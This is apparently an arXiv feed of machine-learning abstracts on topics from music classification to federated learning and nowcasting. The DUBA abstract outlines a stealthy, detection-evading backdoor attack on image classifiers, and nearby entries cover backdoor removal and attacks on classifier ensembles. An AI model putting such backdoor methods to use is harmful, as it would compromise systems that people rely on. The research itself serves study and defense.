    Music recommendation systems have emerged as a vital component in enhancing user experience and satisfaction for music streaming services, which now dominate music consumption. The key challenge in improving these recommender systems lies in comprehending the complexity of music data, specifically for the underpinning task of music genre classification. The limitations of manual genre classification have highlighted the need for a more advanced system, namely Automatic Music Genre Classification (AMGC). While traditional machine learning techniques have shown potential in genre classification, they heavily rely on manually engineered features and feature selection, failing to capture the full complexity of music data. On the other hand, deep learning architectures such as traditional Convolutional Neural Networks (CNNs) are effective at capturing spatial hierarchies but struggle to capture the temporal dynamics inherent in music data. To address these challenges, this study proposes a novel approach that uses visual spectrograms as input to a hybrid model combining the strengths of the Residual Neural Network (ResNet) and the Gated Recurrent Unit (GRU). This model is designed to provide a more comprehensive analysis of music data, offering the potential to improve music recommender systems through more accurate genre classification.
    Multi-Method Self-Training: Improving Code Generation With Text, And Vice Versa. (arXiv:2307.10633v1 [cs.CL])
    Large Language Models have many methods for solving the same problem. This introduces novel strengths (different methods may work well for different problems) and weaknesses (it may be difficult for users to know which method to use). In this paper, we introduce Multi-Method Self-Training (MMST), where one method is trained on the filtered outputs of another, allowing us to augment the strengths and ameliorate the weaknesses of each method. Using a 176B parameter model trained on both language and code, we show that MMST can 1) improve the less performant method (up to 30%) making the model easier to use, 2) improve the more performant method (up to 32.2%) making the model more performant, and 3) improve the performance of related but distinct tasks (up to 10.3%) by improving the ability of the model to generate rationales. We then conduct ablation analyses to explore why MMST works. We show that MMST generates more data than traditional self-training, but the improvement in performance is driven by the use of multiple methods. We also analyze prompt-engineering and anti-correlated performance between methods as means of making MMST more effective. We hope the evidence from our paper motivates machine learning researchers to explore ways in which advances in language models allow for new forms of training.
    SecureBoost Hyperparameter Tuning via Multi-Objective Federated Learning. (arXiv:2307.10579v1 [cs.LG])
    SecureBoost is a tree-boosting algorithm that leverages homomorphic encryption to protect data privacy in the vertical federated learning setting. It is widely used in fields such as finance and healthcare due to its interpretability, effectiveness, and privacy-preserving capability. However, SecureBoost suffers from high computational complexity and a risk of label leakage. To harness its full potential, the hyperparameters of SecureBoost should be carefully chosen to strike an optimal balance between utility, efficiency, and privacy. Existing methods set hyperparameters empirically or heuristically, which is far from optimal. To fill this gap, we propose a Constrained Multi-Objective SecureBoost (CMOSB) algorithm to find Pareto-optimal solutions, each of which is a set of hyperparameters achieving an optimal tradeoff between utility loss, training cost, and privacy leakage. We design measurements for the three objectives; in particular, privacy leakage is measured using our proposed instance clustering attack. Experimental results demonstrate that CMOSB yields not only hyperparameters superior to the baseline but also optimal sets of hyperparameters that can support the flexible requirements of FL participants.
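    The notion of a Pareto-optimal hyperparameter set can be sketched directly (the objective values below are made up; lower is better on all three axes: utility loss, training cost, privacy leakage):

```python
def pareto_front(points):
    """Keep the points not dominated by any other point, where q dominates p
    if q is no worse on every objective and strictly better on at least one."""
    def dominated(p, q):
        return (all(b <= a for a, b in zip(p, q))
                and any(b < a for a, b in zip(p, q)))
    return [p for p in points
            if not any(dominated(p, q) for q in points if q != p)]

# (utility loss, training cost, privacy leakage) for three hyperparameter sets
candidates = [(0.10, 5.0, 0.3), (0.08, 7.0, 0.2), (0.12, 6.0, 0.4)]
print(pareto_front(candidates))  # the third point is dominated by the first
```

The front contains the incomparable tradeoffs; an FL participant then picks from the front according to its own priorities, as the abstract suggests.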
    Meta-Transformer: A Unified Framework for Multimodal Learning. (arXiv:2307.10802v1 [cs.CV])
    Multimodal learning aims to build models that can process and relate information from multiple modalities. Despite years of development in this field, it still remains challenging to design a unified network for processing various modalities ($\textit{e.g.}$ natural language, 2D images, 3D point clouds, audio, video, time series, tabular data) due to the inherent gaps among them. In this work, we propose a framework, named Meta-Transformer, that leverages a $\textbf{frozen}$ encoder to perform multimodal perception without any paired multimodal training data. In Meta-Transformer, the raw input data from various modalities are mapped into a shared token space, allowing a subsequent encoder with frozen parameters to extract high-level semantic features of the input data. Composed of three main components: a unified data tokenizer, a modality-shared encoder, and task-specific heads for downstream tasks, Meta-Transformer is the first framework to perform unified learning across 12 modalities with unpaired data. Experiments on different benchmarks reveal that Meta-Transformer can handle a wide range of tasks including fundamental perception (text, image, point cloud, audio, video), practical application (X-Ray, infrared, hyperspectral, and IMU), and data mining (graph, tabular, and time-series). Meta-Transformer indicates a promising future for developing unified multimodal intelligence with transformers. Code will be available at https://github.com/invictus717/MetaTransformer
    Ensemble Learning based Anomaly Detection for IoT Cybersecurity via Bayesian Hyperparameters Sensitivity Analysis. (arXiv:2307.10596v1 [cs.LG])
    The Internet of Things (IoT) integrates billions of intelligent devices around the globe with the capability of communicating with other connected devices with little to no human intervention. IoT enables data aggregation and analysis on a large scale to improve quality of life in many domains. In particular, data collected by IoT devices contain a tremendous amount of information for anomaly detection. The heterogeneous nature of IoT is both a challenge and an opportunity for cybersecurity. Traditional approaches in cybersecurity monitoring often require different kinds of data pre-processing and handling for various data types, which can be problematic for datasets that contain heterogeneous features. However, heterogeneous types of network devices can often capture a more diverse set of signals than a single type of device, which is particularly useful for anomaly detection. In this paper, we present a comprehensive study on using ensemble machine learning methods to enhance IoT cybersecurity via anomaly detection. Rather than using a single machine learning model, ensemble learning combines the predictive power of multiple models, enhancing predictive accuracy on heterogeneous datasets. We propose a unified ensemble learning framework that utilises Bayesian hyperparameter optimisation to adapt to a network environment that contains multiple IoT sensor readings. Experimentally, we illustrate its high predictive power compared to traditional methods.
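    Stripped of the Bayesian hyperparameter optimisation, the basic ensemble idea reduces to combining several models' predictions, e.g. by majority vote (the per-model predictions below are hard-coded stand-ins for real classifier outputs):

```python
from collections import Counter

def majority_vote(predictions_per_model):
    """Combine hard labels from several models by per-sample majority vote.
    predictions_per_model: list of per-model label lists, one label per sample."""
    n_samples = len(predictions_per_model[0])
    return [Counter(model[i] for model in predictions_per_model)
            .most_common(1)[0][0]
            for i in range(n_samples)]

# three models' anomaly labels (0 = normal, 1 = anomalous) for three samples
votes = [[0, 1, 1], [0, 1, 0], [1, 1, 0]]
print(majority_vote(votes))  # → [0, 1, 0]
```

Other combiners (weighted voting, stacking) follow the same pattern; the paper additionally tunes each base model's hyperparameters with Bayesian optimisation.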
    Feed-Forward Source-Free Domain Adaptation via Class Prototypes. (arXiv:2307.10787v1 [cs.CV])
    Source-free domain adaptation has become popular because it is practically useful and requires no access to source data. However, the adaptation process still takes a considerable amount of time and is predominantly based on optimization that relies on back-propagation. In this work we present a simple feed-forward approach that challenges the need for back-propagation-based adaptation. Our approach computes class prototypes under the domain shift using a pre-trained model. It achieves strong improvements in accuracy compared to the pre-trained model and requires only a small fraction of the time of existing domain adaptation methods.
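    The prototype-based, back-prop-free adaptation described above can be sketched in a few lines (the feature vectors and labels are toy values; in the paper the features come from a pre-trained model applied to shifted target data):

```python
import numpy as np

def build_prototypes(features, labels):
    """Average the feature vectors of each class to form one prototype per class."""
    classes = sorted(set(labels))
    return {c: features[np.array(labels) == c].mean(axis=0) for c in classes}

def predict(x, prototypes):
    """Classify a feature vector by its nearest class prototype."""
    return min(prototypes, key=lambda c: np.linalg.norm(x - prototypes[c]))

feats = np.array([[0.0, 0.1], [0.1, 0.0], [1.0, 0.9], [0.9, 1.1]])
labels = [0, 0, 1, 1]
protos = build_prototypes(feats, labels)
print(predict(np.array([0.05, 0.05]), protos))  # → 0
```

Both steps are pure feed-forward computation: no gradients flow, which is what makes this kind of adaptation so much faster than optimization-based alternatives.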
    FedBug: A Bottom-Up Gradual Unfreezing Framework for Federated Learning. (arXiv:2307.10317v1 [cs.LG])
    Federated Learning (FL) offers a collaborative training framework, allowing multiple clients to contribute to a shared model without compromising data privacy. Due to the heterogeneous nature of local datasets, updated client models may overfit and diverge from one another, commonly known as the problem of client drift. In this paper, we propose FedBug (Federated Learning with Bottom-Up Gradual Unfreezing), a novel FL framework designed to effectively mitigate client drift. FedBug adaptively leverages the client model parameters, distributed by the server at each global round, as the reference points for cross-client alignment. Specifically, on the client side, FedBug begins by freezing the entire model, then gradually unfreezes the layers, from the input layer to the output layer. This bottom-up approach allows models to train the newly thawed layers to project data into a latent space, wherein the separating hyperplanes remain consistent across all clients. We theoretically analyze FedBug in a novel over-parameterization FL setup, revealing its superior convergence rate compared to FedAvg. Through comprehensive experiments, spanning various datasets, training conditions, and network architectures, we validate the efficacy of FedBug. Our contributions encompass a novel FL framework, theoretical analysis, and empirical validation, demonstrating the wide potential and applicability of FedBug.
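    The bottom-up unfreezing schedule at the heart of the abstract can be sketched as a pure function of training progress (the layer names and linear granularity are illustrative, not FedBug's exact schedule):

```python
def trainable_layers(layers, progress):
    """Given layers ordered from input to output and progress in [0, 1]
    (fraction of the current round elapsed), return the layers that are
    currently unfrozen. Unfreezing proceeds from the input side first."""
    n_unfrozen = min(len(layers), int(progress * len(layers)) + 1)
    return layers[:n_unfrozen]

layers = ["conv1", "conv2", "fc1", "fc2"]
print(trainable_layers(layers, 0.0))  # → ['conv1']
print(trainable_layers(layers, 0.5))  # → ['conv1', 'conv2', 'fc1']
print(trainable_layers(layers, 1.0))  # → ['conv1', 'conv2', 'fc1', 'fc2']
```

Each client would freeze everything else at a given step and train only the returned layers, so early in a round all clients project data through the same frozen upper layers.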
    MSQNet: Actor-agnostic Action Recognition with Multi-modal Query. (arXiv:2307.10763v1 [cs.CV])
    Existing action recognition methods are typically actor-specific due to the intrinsic topological and apparent differences among the actors. This requires actor-specific pose estimation (e.g., humans vs. animals), leading to cumbersome model design complexity and high maintenance costs. Moreover, they often focus on learning the visual modality alone and single-label classification whilst neglecting other available information sources (e.g., class name text) and the concurrent occurrence of multiple actions. To overcome these limitations, we propose a new approach called 'actor-agnostic multi-modal multi-label action recognition,' which offers a unified solution for various types of actors, including humans and animals. We further formulate a novel Multi-modal Semantic Query Network (MSQNet) model in a transformer-based object detection framework (e.g., DETR), characterized by leveraging visual and textual modalities to represent the action classes better. The elimination of actor-specific model designs is a key advantage, as it removes the need for actor pose estimation altogether. Extensive experiments on five publicly available benchmarks show that our MSQNet consistently outperforms the prior arts of actor-specific alternatives on human and animal single- and multi-label action recognition tasks by up to 50%. Code will be released at https://github.com/mondalanindya/MSQNet.
    A Dual Stealthy Backdoor: From Both Spatial and Frequency Perspectives. (arXiv:2307.10184v1 [cs.CR])
    Backdoor attacks pose serious security threats to deep neural networks (DNNs). Backdoored models make arbitrary (targeted) incorrect predictions on inputs embedded with well-designed triggers while behaving normally on clean inputs. Many works have explored the invisibility of backdoor triggers to improve attack stealthiness. However, most of them only consider invisibility in the spatial domain without explicitly accounting for the generation of invisible triggers in the frequency domain, making the generated poisoned images easy to detect by recent defense methods. To address this issue, we propose a DUal stealthy BAckdoor attack method named DUBA, which simultaneously considers the invisibility of triggers in both the spatial and frequency domains to achieve desirable attack performance while ensuring strong stealthiness. Specifically, we first use the Discrete Wavelet Transform to embed the high-frequency information of the trigger image into the clean image to ensure attack effectiveness. Then, to attain strong stealthiness, we incorporate the Fourier Transform and the Discrete Cosine Transform to mix the poisoned image and clean image in the frequency domain. Moreover, DUBA adopts a novel attack strategy, in which the model is trained with weak triggers and attacked with strong triggers, to further enhance attack performance and stealthiness. We extensively evaluate DUBA against popular image classifiers on four datasets. The results demonstrate that it significantly outperforms state-of-the-art backdoor attacks in terms of attack success rate and stealthiness.
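    A rough sketch of frequency-domain trigger blending, using a simple FFT high/low-frequency split instead of the paper's DWT/DCT pipeline (the cutoff, blend ratio, and image sizes are all illustrative):

```python
import numpy as np

def frequency_blend(clean, trigger, cutoff=4, alpha=0.2):
    """Blend the trigger's high-frequency content into the clean image:
    keep the clean image's low frequencies, mix in the trigger above a cutoff."""
    C, T = np.fft.fft2(clean), np.fft.fft2(trigger)
    fy = np.fft.fftfreq(clean.shape[0])[:, None]
    fx = np.fft.fftfreq(clean.shape[1])[None, :]
    high = (np.abs(fy) + np.abs(fx)) > (cutoff / clean.shape[0])
    mixed = np.where(high, (1 - alpha) * C + alpha * T, C)
    return np.real(np.fft.ifft2(mixed))

clean = np.ones((16, 16))
trigger = np.random.default_rng(0).random((16, 16))
poisoned = frequency_blend(clean, trigger)
print(np.max(np.abs(poisoned - clean)))  # small, high-frequency perturbation
```

Because the perturbation lives only in the high frequencies, it is hard to see spatially, which is the intuition behind combining spatial and frequency-domain stealthiness.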
    Divide & Bind Your Attention for Improved Generative Semantic Nursing. (arXiv:2307.10864v1 [cs.CV])
Emerging large-scale text-to-image generative models, e.g., Stable Diffusion (SD), have exhibited overwhelming results with high fidelity. Despite the magnificent progress, current state-of-the-art models still struggle to generate images fully adhering to the input prompt. Prior work, Attend & Excite, has introduced the concept of Generative Semantic Nursing (GSN), aiming to optimize cross-attention during inference time to better incorporate the semantics. It demonstrates promising results in generating simple prompts, e.g., "a cat and a dog". However, its efficacy declines when dealing with more complex prompts, and it does not explicitly address the problem of improper attribute binding. To address the challenges posed by complex prompts or scenarios involving multiple entities and to achieve improved attribute binding, we propose Divide & Bind. We introduce two novel loss objectives for GSN: an attendance loss and a binding loss. Our approach stands out in its ability to faithfully synthesize desired objects with improved attribute alignment from complex prompts and exhibits superior performance across multiple evaluation benchmarks. More videos and updates can be found on the project page https://sites.google.com/view/divide-and-bind.
    Identifying Interpretable Subspaces in Image Representations. (arXiv:2307.10504v1 [cs.CV])
    We propose Automatic Feature Explanation using Contrasting Concepts (FALCON), an interpretability framework to explain features of image representations. For a target feature, FALCON captions its highly activating cropped images using a large captioning dataset (like LAION-400m) and a pre-trained vision-language model like CLIP. Each word among the captions is scored and ranked leading to a small number of shared, human-understandable concepts that closely describe the target feature. FALCON also applies contrastive interpretation using lowly activating (counterfactual) images, to eliminate spurious concepts. Although many existing approaches interpret features independently, we observe in state-of-the-art self-supervised and supervised models, that less than 20% of the representation space can be explained by individual features. We show that features in larger spaces become more interpretable when studied in groups and can be explained with high-order scoring concepts through FALCON. We discuss how extracted concepts can be used to explain and debug failures in downstream tasks. Finally, we present a technique to transfer concepts from one (explainable) representation space to another unseen representation space by learning a simple linear transformation.
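The word scoring in the pipeline above can be illustrated with a toy contrastive scheme (this is an assumption for illustration, not FALCON's exact scoring formula): words frequent in captions of highly activating crops but rare in captions of lowly activating (counterfactual) images surface as candidate concepts.

```python
from collections import Counter

def concept_scores(pos_captions, neg_captions):
    """Toy contrastive word scoring: rank each word by how much more often
    it appears in captions of highly activating crops than in captions of
    counterfactual (lowly activating) images."""
    pos = Counter(w for c in pos_captions for w in c.lower().split())
    neg = Counter(w for c in neg_captions for w in c.lower().split())
    n_pos, n_neg = len(pos_captions), len(neg_captions)
    return {w: pos[w] / n_pos - neg[w] / n_neg for w in pos}

# Hypothetical captions for a feature that fires on striped textures:
scores = concept_scores(
    ["striped cat", "striped sofa", "striped shirt"],  # highly activating
    ["plain cat", "plain sofa"],                       # counterfactual
)
```

Here "striped" gets the top score while "cat" and "sofa", which also appear in the counterfactual captions, are suppressed as spurious concepts.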
    A Matrix Ensemble Kalman Filter-based Multi-arm Neural Network to Adequately Approximate Deep Neural Networks. (arXiv:2307.10436v1 [stat.ML])
Deep Learners (DLs) are the state-of-the-art predictive mechanism with applications in many fields requiring complex high dimensional data processing. Although conventional DLs get trained via gradient descent with back-propagation, Kalman Filter (KF)-based techniques that do not need gradient computation have been developed to approximate DLs. We propose a multi-arm extension of a KF-based DL approximator that can mimic DL when the sample size is too small to train a multi-arm DL. The proposed Matrix Ensemble Kalman Filter-based multi-arm ANN (MEnKF-ANN) also performs explicit model stacking that becomes relevant when the training sample has an unequal-size feature set. Our proposed technique can approximate Long Short-term Memory (LSTM) Networks and attach uncertainty to the predictions obtained from these LSTMs with desirable coverage. We demonstrate how MEnKF-ANN can "adequately" approximate an LSTM network trained to classify what carbohydrate substrates are digested and utilized by a microbiome sample whose genomic sequences consist of polysaccharide utilization loci (PULs) and their encoded genes.
    Shared Adversarial Unlearning: Backdoor Mitigation by Unlearning Shared Adversarial Examples. (arXiv:2307.10562v1 [cs.LG])
Backdoor attacks are serious security threats to machine learning models where an adversary can inject poisoned samples into the training set, causing a backdoored model which predicts poisoned samples with particular triggers to particular target classes, while behaving normally on benign samples. In this paper, we explore the task of purifying a backdoored model using a small clean dataset. By establishing the connection between backdoor risk and adversarial risk, we derive a novel upper bound for backdoor risk, which mainly captures the risk on the shared adversarial examples (SAEs) between the backdoored model and the purified model. This upper bound further suggests a novel bi-level optimization problem for mitigating backdoor using adversarial training techniques. To solve it, we propose Shared Adversarial Unlearning (SAU). Specifically, SAU first generates SAEs, and then unlearns the generated SAEs so that they are either correctly classified by the purified model or classified differently by the two models, mitigating the backdoor effect of the backdoored model in the purified model. Experiments on various benchmark datasets and network architectures show that our proposed method achieves state-of-the-art performance for backdoor defense.
    Mood Classification of Bangla Songs Based on Lyrics. (arXiv:2307.10314v1 [cs.IR])
Music can evoke various emotions, and with the advancement of technology, it has become more accessible to people. Bangla music, which portrays different human emotions, lacks sufficient research. The authors of this article aim to analyze Bangla songs and classify their moods based on the lyrics. To achieve this, the research compiled a dataset of 4000 Bangla song lyrics with their genres, and used Natural Language Processing and the BERT algorithm to analyze the data. Among the 4000 songs, 1513 represent the sad mood, 1362 the romantic mood, 886 happiness, and the remaining 239 are classified as relaxation. By embedding the lyrics of the songs, the authors have classified the songs into four moods: Happy, Sad, Romantic, and Relaxed. This research is crucial as it enables a multi-class classification of songs' moods, making the music more relatable to people's emotions. The article presents the automated results for the four moods accurately derived from the song lyrics.
    Beyond Black-Box Advice: Learning-Augmented Algorithms for MDPs with Q-Value Predictions. (arXiv:2307.10524v1 [cs.LG])
We study the tradeoff between consistency and robustness in the context of a single-trajectory time-varying Markov Decision Process (MDP) with untrusted machine-learned advice. Our work departs from the typical approach of treating advice as coming from black-box sources by instead considering a setting where additional information about how the advice is generated is available. We prove a first-of-its-kind consistency and robustness tradeoff given Q-value advice under a general MDP model that includes both continuous and discrete state/action spaces. Our results highlight that utilizing Q-value advice enables dynamic pursuit of the better of machine-learned advice and a robust baseline, thus resulting in near-optimal performance guarantees, which provably improves what can be obtained solely with black-box advice.
    Classification of Visualization Types and Perspectives in Patents. (arXiv:2307.10471v1 [cs.CV])
Due to the swift growth of patent applications each year, information and multimedia retrieval approaches that facilitate patent exploration and retrieval are of utmost importance. Different types of visualizations (e.g., graphs, technical drawings) and perspectives (e.g., side view, perspective view) are used to visualize details of innovations in patents. The classification of these images enables a more efficient search and allows for further analysis. So far, datasets for image type classification miss some important visualization types for patents. Furthermore, related work does not make use of recent deep learning approaches including transformers. In this paper, we adopt state-of-the-art deep learning methods for the classification of visualization types and perspectives in patent images. We extend the CLEF-IP dataset for image type classification in patents to ten classes and provide manual ground truth annotations. In addition, we derive a set of hierarchical classes from a dataset that provides weakly-labeled data for image perspectives. Experimental results have demonstrated the feasibility of the proposed approaches. Source code, models, and dataset will be made publicly available.
    Deep Neural Networks and Brain Alignment: Brain Encoding and Decoding (Survey). (arXiv:2307.10246v1 [q-bio.NC])
How does the brain represent different modes of information? Can we design a system that automatically understands what the user is thinking? Such questions can be answered by studying brain recordings like functional magnetic resonance imaging (fMRI). As a first step, the neuroscience community has contributed several large cognitive neuroscience datasets related to passive reading/listening/viewing of concept words, narratives, pictures and movies. Encoding and decoding models using these datasets have also been proposed in the past two decades. These models serve as additional tools for basic research in cognitive science and neuroscience. Encoding models aim at generating fMRI brain representations given a stimulus automatically. They have several practical applications in evaluating and diagnosing neurological conditions and thus also help design therapies for brain damage. Decoding models solve the inverse problem of reconstructing the stimuli given the fMRI. They are useful for designing brain-machine or brain-computer interfaces. Inspired by the effectiveness of deep learning models for natural language processing, computer vision, and speech, recently several neural encoding and decoding models have been proposed. In this survey, we will first discuss popular representations of language, vision and speech stimuli, and present a summary of neuroscience datasets. Further, we will review popular deep learning based encoding and decoding architectures and note their benefits and limitations. Finally, we will conclude with a brief summary and discussion about future trends. Given the large amount of recently published work in the 'computational cognitive neuroscience' community, we believe that this survey nicely organizes the plethora of work and presents it as a coherent story.
    Long-Tail Theory under Gaussian Mixtures. (arXiv:2307.10736v1 [cs.LG])
    We suggest a simple Gaussian mixture model for data generation that complies with Feldman's long tail theory (2020). We demonstrate that a linear classifier cannot decrease the generalization error below a certain level in the proposed model, whereas a nonlinear classifier with a memorization capacity can. This confirms that for long-tailed distributions, rare training examples must be considered for optimal generalization to new data. Finally, we show that the performance gap between linear and nonlinear models can be lessened as the tail becomes shorter in the subpopulation frequency distribution, as confirmed by experiments on synthetic and real data.
    Global Precipitation Nowcasting of Integrated Multi-satellitE Retrievals for GPM: A U-Net Convolutional LSTM Architecture. (arXiv:2307.10843v1 [cs.LG])
This paper presents a deep learning architecture for nowcasting of precipitation almost globally every 30 min with a 4-hour lead time. The architecture fuses a U-Net and a convolutional long short-term memory (LSTM) neural network and is trained using data from the Integrated Multi-satellitE Retrievals for GPM (IMERG) and a few key precipitation drivers from the Global Forecast System (GFS). The impacts of different training loss functions, including the mean-squared error (regression) and the focal loss (classification), on the quality of precipitation nowcasts are studied. The results indicate that the regression network performs well in capturing light precipitation (below 1.6 mm/hr), but the classification network can outperform the regression network for nowcasting of precipitation extremes (>8 mm/hr), in terms of the critical success index (CSI). Using the Wasserstein distance, it is shown that the predicted precipitation by the classification network has a closer class probability distribution to the IMERG than the regression network. It is uncovered that the inclusion of the physical variables can improve precipitation nowcasting, especially at longer lead times in both networks. Taking IMERG as a relative reference, a multi-scale analysis in terms of fractions skill score (FSS) shows that the nowcasting machine remains skillful (FSS > 0.5) at the resolution of 10 km compared to 50 km for GFS. For precipitation rates greater than 4 mm/hr, only the classification network remains FSS-skillful on scales greater than 50 km within a 2-hour lead time.
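The critical success index used to compare the two networks is a standard contingency-table score: after thresholding both fields into rain / no-rain events, CSI = hits / (hits + misses + false alarms). A minimal sketch (the 1.6 mm/hr threshold below mirrors the light-precipitation cutoff in the abstract):

```python
import numpy as np

def critical_success_index(pred, obs, threshold):
    """CSI = hits / (hits + misses + false alarms), computed after
    thresholding predicted and observed precipitation into binary events.
    Correct negatives (no rain predicted, none observed) do not count."""
    p = np.asarray(pred) >= threshold
    o = np.asarray(obs) >= threshold
    hits = np.sum(p & o)
    misses = np.sum(~p & o)
    false_alarms = np.sum(p & ~o)
    return hits / (hits + misses + false_alarms)

# Four grid cells, rain rates in mm/hr:
csi = critical_success_index([2.0, 0.0, 5.0, 1.0], [2.0, 3.0, 0.0, 0.0], 1.6)
```

With one hit, one miss, and one false alarm in this toy example, the CSI is 1/3; a perfect nowcast scores 1.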
    Player-optimal Stable Regret for Bandit Learning in Matching Markets. (arXiv:2307.10890v1 [cs.LG])
The problem of matching markets has been studied for a long time in the literature due to its wide range of applications. Finding a stable matching is a common equilibrium objective in this problem. Since market participants are usually uncertain of their preferences, a rich line of recent works study the online setting where one-side participants (players) learn their unknown preferences from iterative interactions with the other side (arms). Most previous works in this line are only able to derive theoretical guarantees for player-pessimal stable regret, which is defined compared with the players' least-preferred stable matching. However, under the pessimal stable matching, players only obtain the least reward among all stable matchings. To maximize players' profits, the player-optimal stable matching would be the most desirable. Though Basu et al. (2021) successfully brought an upper bound for player-optimal stable regret, their result can be exponentially large if the players' preference gap is small. Whether a polynomial guarantee for this regret exists is a significant but still open problem. In this work, we provide a new algorithm named explore-then-Gale-Shapley (ETGS) and show that the optimal stable regret of each player can be upper bounded by $O(K\log T/\Delta^2)$ where $K$ is the number of arms, $T$ is the horizon and $\Delta$ is the players' minimum preference gap among the first $N+1$-ranked arms. This result significantly improves on previous works, which either have a weaker player-pessimal stable matching objective or apply only to markets with special assumptions. When the preferences of participants satisfy some special conditions, our regret upper bound also matches the previously derived lower bound.
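The exploit phase of explore-then-Gale-Shapley relies on the classic player-proposing deferred-acceptance procedure, which produces the player-optimal stable matching once preferences are known. A standard sketch (the dict-based data layout is an assumption for illustration):

```python
def gale_shapley(player_prefs, arm_prefs):
    """Player-proposing deferred acceptance.

    player_prefs[p] = list of arms in decreasing preference order.
    arm_prefs[a]    = list of players in decreasing preference order.
    Returns the player-optimal stable matching as a dict player -> arm.
    """
    # rank[a][p]: position of player p in arm a's preference list (lower = better)
    rank = {a: {p: i for i, p in enumerate(prefs)} for a, prefs in arm_prefs.items()}
    next_proposal = {p: 0 for p in player_prefs}  # index of the next arm to try
    match = {}                                    # arm -> tentatively accepted player
    free = list(player_prefs)
    while free:
        p = free.pop()
        a = player_prefs[p][next_proposal[p]]
        next_proposal[p] += 1
        if a not in match:
            match[a] = p                          # arm was free: accept
        elif rank[a][p] < rank[a][match[a]]:
            free.append(match[a])                 # arm trades up, old player freed
            match[a] = p
        else:
            free.append(p)                        # rejected, p proposes again later
    return {p: a for a, p in match.items()}
```

In the bandit setting, the explore phase first estimates each player's preference order from rewards; deferred acceptance is then run on the learned preferences.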
    Neural Network Complexity of Chaos and Turbulence. (arXiv:2211.15382v2 [cs.LG] UPDATED)
    Chaos and turbulence are complex physical phenomena, yet a precise definition of the complexity measure that quantifies them is still lacking. In this work we consider the relative complexity of chaos and turbulence from the perspective of deep neural networks. We analyze a set of classification problems, where the network has to distinguish images of fluid profiles in the turbulent regime from other classes of images such as fluid profiles in the chaotic regime, various constructions of noise and real world images. We analyze incompressible as well as weakly compressible fluid flows. We quantify the complexity of the computation performed by the network via the intrinsic dimensionality of the internal feature representations, and calculate the effective number of independent features which the network uses in order to distinguish between classes. In addition to providing a numerical estimate of the complexity of the computation, the measure also characterizes the neural network processing at intermediate and final stages. We construct adversarial examples and use them to identify the two point correlation spectra for the chaotic and turbulent vorticity as the feature used by the network for classification.
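A simple proxy for the intrinsic dimensionality of internal feature representations, mentioned above as the complexity measure, can be sketched with PCA (this estimator choice is an assumption for illustration; the paper may use a different intrinsic-dimension estimator):

```python
import numpy as np

def pca_intrinsic_dim(X, var_threshold=0.99):
    """Crude intrinsic-dimensionality proxy: the number of principal
    components needed to explain var_threshold of the total variance of
    the feature matrix X (rows = samples, columns = features)."""
    Xc = X - X.mean(axis=0)
    s = np.linalg.svd(Xc, compute_uv=False)      # singular values
    explained = np.cumsum(s**2) / np.sum(s**2)   # cumulative variance ratio
    return int(np.searchsorted(explained, var_threshold) + 1)
```

Features that concentrate on a low-dimensional manifold (e.g., a network that separates turbulence from noise using only a handful of independent features) yield a small value even when the ambient feature dimension is large.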
    Decoding the Enigma: Benchmarking Humans and AIs on the Many Facets of Working Memory. (arXiv:2307.10768v1 [q-bio.NC])
    Working memory (WM), a fundamental cognitive process facilitating the temporary storage, integration, manipulation, and retrieval of information, plays a vital role in reasoning and decision-making tasks. Robust benchmark datasets that capture the multifaceted nature of WM are crucial for the effective development and evaluation of AI WM models. Here, we introduce a comprehensive Working Memory (WorM) benchmark dataset for this purpose. WorM comprises 10 tasks and a total of 1 million trials, assessing 4 functionalities, 3 domains, and 11 behavioral and neural characteristics of WM. We jointly trained and tested state-of-the-art recurrent neural networks and transformers on all these tasks. We also include human behavioral benchmarks as an upper bound for comparison. Our results suggest that AI models replicate some characteristics of WM in the brain, most notably primacy and recency effects, and neural clusters and correlates specialized for different domains and functionalities of WM. In the experiments, we also reveal some limitations in existing models to approximate human behavior. This dataset serves as a valuable resource for communities in cognitive psychology, neuroscience, and AI, offering a standardized framework to compare and enhance WM models, investigate WM's neural underpinnings, and develop WM models with human-like capabilities. Our source code and data are available at https://github.com/ZhangLab-DeepNeuroCogLab/WorM.
    Adversarial attacks for mixtures of classifiers. (arXiv:2307.10788v1 [cs.LG])
    Mixtures of classifiers (a.k.a. randomized ensembles) have been proposed as a way to improve robustness against adversarial attacks. However, it has been shown that existing attacks are not well suited for this kind of classifiers. In this paper, we discuss the problem of attacking a mixture in a principled way and introduce two desirable properties of attacks based on a geometrical analysis of the problem (effectiveness and maximality). We then show that existing attacks do not meet both of these properties. Finally, we introduce a new attack called lattice climber attack with theoretical guarantees on the binary linear setting, and we demonstrate its performance by conducting experiments on synthetic and real datasets.
    Bayesian Spike Train Inference via Non-Local Priors. (arXiv:2307.10177v1 [q-bio.NC])
Advances in neuroscience have enabled researchers to measure the activities of large numbers of neurons simultaneously in behaving animals. We have access to the fluorescence of each of the neurons, which provides a first-order approximation of the neural activity over time. Determining the exact spike times of a neuron from this fluorescence trace constitutes an active area of research within the field of computational neuroscience. We propose a novel Bayesian approach based on a mixture of half-non-local prior densities and point masses for this task. Instead of a computationally expensive MCMC algorithm, we adopt a stochastic search-based approach that is capable of taking advantage of modern computing environments, often equipped with multiple processors, to explore all possible arrangements of spikes and lack thereof in an observed spike train. It then reports the highest posterior probability arrangement of spikes and the posterior probability for a spike at each location of the spike train. Our method leads to substantial improvements over existing approaches based on L1 regularization, and enjoys comparable estimation accuracy to the state-of-the-art L0 proposal, in simulations and on recent calcium imaging data sets. Notably, contrary to optimization-based frequentist approaches, our methodology yields automatic uncertainty quantification associated with the spike-train inference.
    SentimentGPT: Exploiting GPT for Advanced Sentiment Analysis and its Departure from Current Machine Learning. (arXiv:2307.10234v1 [cs.CL])
This study presents a thorough examination of various Generative Pretrained Transformer (GPT) methodologies in sentiment analysis, specifically in the context of Task 4 on the SemEval 2017 dataset. Three primary strategies are employed: 1) prompt engineering using the advanced GPT-3.5 Turbo, 2) fine-tuning GPT models, and 3) an inventive approach to embedding classification. The research yields detailed comparative insights among these strategies and individual GPT models, revealing their unique strengths and potential limitations. Additionally, the study compares these GPT-based methodologies with other contemporary, high-performing models previously used with the same dataset. The results illustrate the significant superiority of the GPT approaches in terms of predictive performance, an improvement of more than 22% in F1-score over the state-of-the-art. Further, the paper addresses common challenges in sentiment analysis tasks, such as understanding context and detecting sarcasm. It underscores the enhanced capabilities of the GPT models to effectively navigate these complexities. Collectively, these findings highlight the promising potential of GPT models in sentiment analysis, setting the stage for future research in this field. The code can be found at https://github.com/DSAatUSU/SentimentGPT.
    Code Detection for Hardware Acceleration Using Large Language Models. (arXiv:2307.10348v1 [cs.SE])
